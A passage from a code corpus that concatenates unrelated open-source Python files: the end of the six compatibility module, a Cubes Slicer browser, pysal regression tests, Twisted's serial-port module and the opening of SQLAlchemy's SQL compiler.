MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
if isinstance(attr, MovedModule):
_importer._add_module(attr, "moves." + attr.name)
del attr
_MovedItems._moved_attributes = _moved_attributes
moves = _MovedItems(__name__ + ".moves")
_importer._add_module(moves, "moves")
class Module_six_moves_urllib_parse(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("SplitResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
MovedAttribute("splitquery", "urllib", "urllib.parse"),
MovedAttribute("splittag", "urllib", "urllib.parse"),
MovedAttribute("splituser", "urllib", "urllib.parse"),
MovedAttribute("uses_fragment", "urlparse", "urllib.parse"),
MovedAttribute("uses_netloc", "urlparse", "urllib.parse"),
MovedAttribute("uses_params", "urlparse", "urllib.parse"),
MovedAttribute("uses_query", "urlparse", "urllib.parse"),
MovedAttribute("uses_relative", "urlparse", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes
_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"),
"moves.urllib_parse", "moves.urllib.parse")
class Module_six_moves_urllib_error(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes
_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"),
"moves.urllib_error", "moves.urllib.error")
class Module_six_moves_urllib_request(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
MovedAttribute("proxy_bypass", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes
_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"),
"moves.urllib_request", "moves.urllib.request")
class Module_six_moves_urllib_response(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes
_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"),
"moves.urllib_response", "moves.urllib.response")
class Module_six_moves_urllib_robotparser(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes
_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"),
"moves.urllib_robotparser", "moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
__path__ = [] # mark as package
parse = _importer._get_module("moves.urllib_parse")
error = _importer._get_module("moves.urllib_error")
request = _importer._get_module("moves.urllib_request")
response = _importer._get_module("moves.urllib_response")
robotparser = _importer._get_module("moves.urllib_robotparser")
def __dir__(self):
return ['parse', 'error', 'request', 'response', 'robotparser']
_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"),
"moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
if PY3:
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def itervalues(d, **kw):
return iter(d.values(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
def iterlists(d, **kw):
return iter(d.lists(**kw))
viewkeys = operator.methodcaller("keys")
viewvalues = operator.methodcaller("values")
viewitems = operator.methodcaller("items")
else:
def iterkeys(d, **kw):
return iter(d.iterkeys(**kw))
def itervalues(d, **kw):
return iter(d.itervalues(**kw))
def iteritems(d, **kw):
return iter(d.iteritems(**kw))
def iterlists(d, **kw):
return iter(d.iterlists(**kw))
viewkeys = operator.methodcaller("viewkeys")
viewvalues = operator.methodcaller("viewvalues")
viewitems = operator.methodcaller("viewitems")
_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.")
_add_doc(itervalues, "Return an iterator over the values of a dictionary.")
_add_doc(iteritems,
"Return an iterator over the (key, value) pairs of a dictionary.")
_add_doc(iterlists,
"Return an iterator over the (key, [values]) pairs of a dictionary.")
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
_assertCountEqual = "assertCountEqual"
_assertRaisesRegex = "assertRaisesRegex"
_assertRegex = "assertRegex"
else:
def b(s):
return s
# Workaround for standalone backslash
def u(s):
return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
iterbytes = functools.partial(itertools.imap, ord)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_assertCountEqual = "assertItemsEqual"
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
def assertCountEqual(self, *args, **kwargs):
return getattr(self, _assertCountEqual)(*args, **kwargs)
def assertRaisesRegex(self, *args, **kwargs):
return getattr(self, _assertRaisesRegex)(*args, **kwargs)
def assertRegex(self, *args, **kwargs):
return getattr(self, _assertRegex)(*args, **kwargs)
if PY3:
exec_ = getattr(moves.builtins, "exec")
def reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
if sys.version_info[:2] == (3, 2):
exec_("""def raise_from(value, from_value):
if from_value is None:
raise value
raise value from from_value
""")
elif sys.version_info[:2] > (3, 2):
exec_("""def raise_from(value, from_value):
raise value from from_value
""")
else:
def raise_from(value, from_value):
raise value
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
def print_(*args, **kwargs):
"""The new-style print function for Python 2.4 and 2.5."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
# If the file has an encoding, encode unicode with it.
if (isinstance(fp, file) and
isinstance(data, unicode) and
fp.encoding is not None):
errors = getattr(fp, "errors", None)
if errors is None:
errors = "strict"
data = data.encode(fp.encoding, errors)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
if sys.version_info[:2] < (3, 3):
_print = print_
def print_(*args, **kwargs):
fp = kwargs.get("file", sys.stdout)
flush = kwargs.pop("flush", False)
_print(*args, **kwargs)
if flush and fp is not None:
fp.flush()
_add_doc(reraise, """Reraise an exception.""")
if sys.version_info[0:2] < (3, 4):
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
else:
wraps = functools.wraps
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
def python_2_unicode_compatible(klass):
"""
A decorator that defines __unicode__ and __str__ methods under Python 2.
Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__ method
returning text and apply this decorator to the class.
"""
if PY2:
if '__str__' not in klass.__dict__:
raise ValueError("@python_2_unicode_compatible cannot be applied "
"to %s because it doesn't define __str__()." %
klass.__name__)
klass.__unicode__ = klass.__str__
klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
return klass
# Complete the moves implementation.
# This code is at the end of this module to speed up module loading.
# Turn this module into a package.
__path__ = [] # required for PEP 302 and PEP 451
__package__ = __name__ # see PEP 366 @ReservedAssignment
if globals().get("__spec__") is not None:
__spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable
# Remove other six meta path importers, since they cause problems. This can
# happen if six is removed from sys.modules and then reloaded. (Setuptools does
# this for some reason.)
if sys.meta_path:
for i, importer in enumerate(sys.meta_path):
# Here's some real nastiness: Another "instance" of the six module might
# be floating around. Therefore, we can't use isinstance() to check for
# the six meta path importer, since the other six instance will have
# inserted an importer with different class.
if (type(importer).__name__ == "_SixMetaPathImporter" and
importer.name == __name__):
del sys.meta_path[i]
break
del i, importer
# Finally, add the importer to the meta path import hook.
sys.meta_path.append(_importer)
| gpl-3.0 |
she11c0de/cubes | cubes/backends/slicer/browser.py | 1 | 4972 | # -*- coding=utf -*-
import urllib2
import json
import logging
import urllib
from ...logging import get_logger
from ...browser import *
class SlicerBrowser(AggregationBrowser):
"""Aggregation browser for Cubes Slicer OLAP server."""
def __init__(self, cube, store, locale=None, **options):
"""Browser for another Slicer server.
"""
super(SlicerBrowser, self).__init__(cube, store, locale)
self.logger = get_logger()
self.cube = cube
self.locale = locale
self.store = store
def features(self):
# Get the original features as provided by the Slicer server.
# They are stored in browser_options in the Slicer model provider's
# cube().
features = dict(self.cube.browser_options.get("features", {}))
# Replace only the actions, as we are not just a simple proxy.
features["actions"] = ["aggregate", "facts", "fact", "cell", "members"]
return features
def provide_aggregate(self, cell, aggregates, drilldown, split, order,
page, page_size, **options):
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if drilldown:
params["drilldown"] = ",".join(drilldown.items_as_strings())
if split:
params["split"] = str(split)
if aggregates:
names = [a.name for a in aggregates]
params["aggregates"] = ",".join(names)
if order:
params["order"] = self._order_param(order)
if page is not None:
params["page"] = str(page)
if page_size is not None:
params["page_size"] = str(page_size)
response = self.store.cube_request("aggregate",
self.cube.basename, params)
result = AggregationResult()
result.cells = response.get('cells', [])
if "summary" in response:
result.summary = response.get('summary')
result.levels = response.get('levels', {})
result.labels = response.get('labels', [])
result.cell = cell
result.aggregates = response.get('aggregates', [])
return result
def facts(self, cell=None, fields=None, order=None, page=None,
page_size=None):
cell = cell or Cell(self.cube)
if fields:
attributes = self.cube.get_attributes(fields)
else:
attributes = []
order = self.prepare_order(order, is_aggregate=False)
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if order:
params["order"] = self._order_param(order)
if page is not None:
params["page"] = str(page)
if page_size is not None:
params["page_size"] = str(page_size)
if attributes:
params["fields"] = ",".join(str(attr) for attr in attributes)
params["format"] = "json_lines"
response = self.store.cube_request("facts", self.cube.basename, params,
is_lines=True)
return Facts(response, attributes)
def provide_members(self, cell=None, dimension=None, levels=None,
hierarchy=None, attributes=None, page=None,
page_size=None, order=None, **options):
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if order:
params["order"] = self._order_param(order)
if levels:
params["level"] = str(levels[-1])
if hierarchy:
params["hierarchy"] = str(hierarchy)
if page is not None:
params["page"] = str(page)
if page_size is not None:
params["page_size"] = str(page_size)
if attributes:
params["fields"] = ",".join(str(attr) for attr in attributes)
params["format"] = "json_lines"
action = "/cube/%s/members/%s" % (self.cube.basename, str(dimension))
response = self.store.request(action, params, is_lines=True)
return response
def cell_details(self, cell, dimension=None):
cell = cell or Cell(self.cube)
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if dimension:
params["dimension"] = str(dimension)
response = self.store.cube_request("cell", self.cube.basename, params)
return response
def fact(self, fact_id):
action = "/cube/%s/fact/%s" % (self.cube.basename, str(fact_id))
response = self.store.request(action)
return response
def is_builtin_function(self, name, aggregate):
return True
def _order_param(self, order):
"""Prepare an order string in form: ``attribute:direction``"""
string = ",".join("%s:%s" % (o[0], o[1]) for o in order)
return string
| mit |
ljwolf/pysal | pysal/contrib/handler/tests/test_error_sp.py | 6 | 7995 | import unittest
import scipy
import pysal
import numpy as np
from pysal.spreg import error_sp as SP
from pysal.contrib.handler import Model
from functools import partial
GM_Error = partial(Model, mtype='GM_Error')
GM_Endog_Error = partial(Model, mtype='GM_Endog_Error')
GM_Combo = partial(Model, mtype='GM_Combo')
class TestGMError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Error(self.y, self.X, self.w)
betas = np.array([[ 47.94371455], [ 0.70598088], [ -0.55571746], [ 0.37230161]])
np.testing.assert_allclose(reg.betas,betas,4)
u = np.array([ 27.4739775])
np.testing.assert_allclose(reg.u[0],u,4)
predy = np.array([ 52.9930255])
np.testing.assert_allclose(reg.predy[0],predy,4)
n = 49
np.testing.assert_allclose(reg.n,n,4)
k = 3
np.testing.assert_allclose(reg.k,k,4)
y = np.array([ 80.467003])
np.testing.assert_allclose(reg.y[0],y,4)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_allclose(reg.x[0],x,4)
e = np.array([ 31.89620319])
np.testing.assert_allclose(reg.e_filtered[0],e,4)
predy = np.array([ 52.9930255])
np.testing.assert_allclose(reg.predy[0],predy,4)
my = 38.43622446938776
np.testing.assert_allclose(reg.mean_y,my)
sy = 18.466069465206047
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([[ 1.51884943e+02, -5.37622793e+00, -1.86970286e+00], [ -5.37622793e+00, 2.48972661e-01, 5.26564244e-02], [ -1.86970286e+00, 5.26564244e-02, 3.18930650e-02]])
np.testing.assert_allclose(reg.vm,vm,4)
sig2 = 191.73716465732355
np.testing.assert_allclose(reg.sig2,sig2,4)
pr2 = 0.3495097406012179
np.testing.assert_allclose(reg.pr2,pr2)
std_err = np.array([ 12.32416094, 0.4989716 , 0.1785863 ])
np.testing.assert_allclose(reg.std_err,std_err,4)
z_stat = np.array([[ 3.89022140e+00, 1.00152805e-04], [ 1.41487186e+00, 1.57106070e-01], [ -3.11175868e+00, 1.85976455e-03]])
np.testing.assert_allclose(reg.z_stat,z_stat,4)
@unittest.skipIf(int(scipy.__version__.split(".")[1]) < 11,
"Maximum Likelihood requires SciPy version 11 or newer.")
class TestGMEndogError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
self.X = np.array(X).T
yd = []
yd.append(db.by_col("CRIME"))
self.yd = np.array(yd).T
q = []
q.append(db.by_col("DISCBD"))
self.q = np.array(q).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Endog_Error(self.y, self.X, self.yd, self.q, self.w)
betas = np.array([[ 55.36095292], [ 0.46411479], [ -0.66883535], [ 0.38989939]])
np.testing.assert_allclose(reg.betas,betas,4)
u = np.array([ 26.55951566])
np.testing.assert_allclose(reg.u[0],u,4)
e = np.array([ 31.23925425])
np.testing.assert_allclose(reg.e_filtered[0],e,4)
predy = np.array([ 53.9074875])
np.testing.assert_allclose(reg.predy[0],predy,4)
n = 49
np.testing.assert_allclose(reg.n,n)
k = 3
np.testing.assert_allclose(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_allclose(reg.y[0],y,4)
x = np.array([ 1. , 19.531])
np.testing.assert_allclose(reg.x[0],x,4)
yend = np.array([ 15.72598])
np.testing.assert_allclose(reg.yend[0],yend,4)
z = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_allclose(reg.z[0],z,4)
my = 38.43622446938776
np.testing.assert_allclose(reg.mean_y,my)
sy = 18.466069465206047
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([[ 5.29158422e+02, -1.57833675e+01, -8.38021080e+00],
[ -1.57833675e+01, 5.40235041e-01, 2.31120327e-01],
[ -8.38021080e+00, 2.31120327e-01, 1.44977385e-01]])
np.testing.assert_allclose(reg.vm,vm,4)
pr2 = 0.346472557570858
np.testing.assert_allclose(reg.pr2,pr2)
sig2 = 192.50022721929574
np.testing.assert_allclose(reg.sig2,sig2,4)
std_err = np.array([ 23.003401 , 0.73500657, 0.38075777])
np.testing.assert_allclose(reg.std_err,std_err,4)
z_stat = np.array([[ 2.40664208, 0.01609994], [ 0.63144305, 0.52775088], [-1.75659016, 0.07898769]])
np.testing.assert_allclose(reg.z_stat,z_stat,4)
@unittest.skipIf(int(scipy.__version__.split(".")[1]) < 11,
"Maximum Likelihood requires SciPy version 11 or newer.")
class TestGMCombo(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
# Only spatial lag
reg = GM_Combo(self.y, self.X, w=self.w)
e_reduced = np.array([ 28.18617481])
np.testing.assert_allclose(reg.e_pred[0],e_reduced,4)
predy_e = np.array([ 52.28082782])
np.testing.assert_allclose(reg.predy_e[0],predy_e,4)
betas = np.array([[ 57.61123515],[ 0.73441313], [ -0.59459416], [ -0.21762921], [ 0.54732051]])
np.testing.assert_allclose(reg.betas,betas,4)
u = np.array([ 25.57932637])
np.testing.assert_allclose(reg.u[0],u,4)
e_filtered = np.array([ 31.65374945])
np.testing.assert_allclose(reg.e_filtered[0],e_filtered,4)
predy = np.array([ 54.88767685])
np.testing.assert_allclose(reg.predy[0],predy,4)
n = 49
np.testing.assert_allclose(reg.n,n)
k = 4
np.testing.assert_allclose(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_allclose(reg.y[0],y,4)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_allclose(reg.x[0],x,4)
yend = np.array([ 35.4585005])
np.testing.assert_allclose(reg.yend[0],yend,4)
z = np.array([ 1. , 19.531 , 15.72598 , 35.4585005])
np.testing.assert_allclose(reg.z[0],z,4)
my = 38.43622446938776
np.testing.assert_allclose(reg.mean_y,my)
sy = 18.466069465206047
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([ 5.22438333e+02, 2.38012875e-01, 3.20924173e-02,
2.15753579e-01])
np.testing.assert_allclose(np.diag(reg.vm),vm,4)
sig2 = 181.78650186468832
np.testing.assert_allclose(reg.sig2,sig2,4)
pr2 = 0.3018280166937799
np.testing.assert_allclose(reg.pr2,pr2,4)
pr2_e = 0.3561355586759414
np.testing.assert_allclose(reg.pr2_e,pr2_e,4)
std_err = np.array([ 22.85692222, 0.48786559, 0.17914356, 0.46449318])
np.testing.assert_allclose(reg.std_err,std_err,4)
z_stat = np.array([[ 2.52051597e+00, 1.17182922e-02], [ 1.50535954e+00, 1.32231664e-01], [ -3.31909311e+00, 9.03103123e-04], [ -4.68530506e-01, 6.39405261e-01]])
np.testing.assert_allclose(reg.z_stat,z_stat,4)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
kuri65536/python-for-android | python-modules/twisted/twisted/internet/serialport.py | 56 | 1908 | # Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Serial Port Protocol
"""
# http://twistedmatrix.com/trac/ticket/3725#comment:24
# Apparently applications use these names even though they should
# be imported from pyserial
__all__ = ["serial", "PARITY_ODD", "PARITY_EVEN", "PARITY_NONE",
"STOPBITS_TWO", "STOPBITS_ONE", "FIVEBITS",
"EIGHTBITS", "SEVENBITS", "SIXBITS",
# Name this module is actually trying to export
"SerialPort"]
# system imports
import os, sys
# all of them require pyserial at the moment, so check that first
import serial
from serial import PARITY_NONE, PARITY_EVEN, PARITY_ODD
from serial import STOPBITS_ONE, STOPBITS_TWO
from serial import FIVEBITS, SIXBITS, SEVENBITS, EIGHTBITS
# common code for serial ports
class BaseSerialPort:
def setBaudRate(self, baudrate):
if hasattr(self._serial, "setBaudrate"):
self._serial.setBaudrate(baudrate)
else:
self._serial.setBaudRate(baudrate)
def inWaiting(self):
return self._serial.inWaiting()
def flushInput(self):
self._serial.flushInput()
def flushOutput(self):
self._serial.flushOutput()
def sendBreak(self):
self._serial.sendBreak()
def getDSR(self):
return self._serial.getDSR()
def getCD(self):
return self._serial.getCD()
def getRI(self):
return self._serial.getRI()
def getCTS(self):
return self._serial.getCTS()
def setDTR(self, on = 1):
self._serial.setDTR(on)
def setRTS(self, on = 1):
self._serial.setRTS(on)
class SerialPort(BaseSerialPort):
pass
# replace SerialPort with appropriate serial port
if os.name == 'posix':
from twisted.internet._posixserialport import SerialPort
elif sys.platform == 'win32':
from twisted.internet._win32serialport import SerialPort
| apache-2.0 |
codeforamerica/skillcamp | ENV/lib/python2.7/site-packages/sqlalchemy/sql/compiler.py | 76 | 111426 | # sql/compiler.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Base SQL and DDL compiler implementations.
Classes provided include:
:class:`.compiler.SQLCompiler` - renders SQL
strings
:class:`.compiler.DDLCompiler` - renders DDL
(data definition language) strings
:class:`.compiler.GenericTypeCompiler` - renders
type specification strings.
To generate user-defined SQL strings, see
:doc:`/ext/compiler`.
"""
import re
from . import schema, sqltypes, operators, functions, \
util as sql_util, visitors, elements, selectable, base
from .. import util, exc
import decimal
import itertools
import operator
RESERVED_WORDS = set([
'all', 'analyse', 'analyze', 'and', 'any', 'array',
'as', 'asc', 'asymmetric', 'authorization', 'between',
'binary', 'both', 'case', 'cast', 'check', 'collate',
'column', 'constraint', 'create', 'cross', 'current_date',
'current_role', 'current_time', 'current_timestamp',
'current_user', 'default', 'deferrable', 'desc',
'distinct', 'do', 'else', 'end', 'except', 'false',
'for', 'foreign', 'freeze', 'from', 'full', 'grant',
'group', 'having', 'ilike', 'in', 'initially', 'inner',
'intersect', 'into', 'is', 'isnull', 'join', 'leading',
'left', 'like', 'limit', 'localtime', 'localtimestamp',
'natural', 'new', 'not', 'notnull', 'null', 'off', 'offset',
